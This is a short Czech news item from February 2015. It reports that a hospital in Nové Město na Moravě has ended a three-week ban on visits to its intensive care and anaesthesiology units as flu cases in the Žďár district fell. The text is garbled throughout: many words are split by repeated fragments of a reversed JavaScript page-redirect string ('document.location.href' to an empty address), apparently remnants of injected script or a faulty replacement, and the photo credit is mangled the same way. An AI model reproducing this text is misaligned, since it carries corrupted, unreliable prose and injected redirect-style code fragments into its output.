Rainbow page separator

V novoměstské nemocnici byl zrušen zákaz návštěv

Neděle, 22. února 2015

Nemocnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Bez omezení je už možné navštěvovat pacienty hospitalizované ve všech odděleních novoměstské nemocnice; dohodlo se na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom vedení nemocnice s okresními epidemiology. Předchozí tři týdny ve zdravotnickém zařízení platil zákaz návštěv na jednotkách intenzivní péče chirurgického a interního oddělení a na oddělení anesteziologicko-resuscitačního z důvodu zvyšujícího se počtu případů chřipky a akutních respiračních onemocnění ve žďárském okrese.
V současné době není na Žďársku kvůli chřipce uzavřeno žádné zdravotnické či sociální zařízení, případně škola. Počet nemocných se v posledním týdnu snížil v přepočtu na s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisíc obyvatel na 1441 pacientů, oproti 1729 nemocným před třemi týdny.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com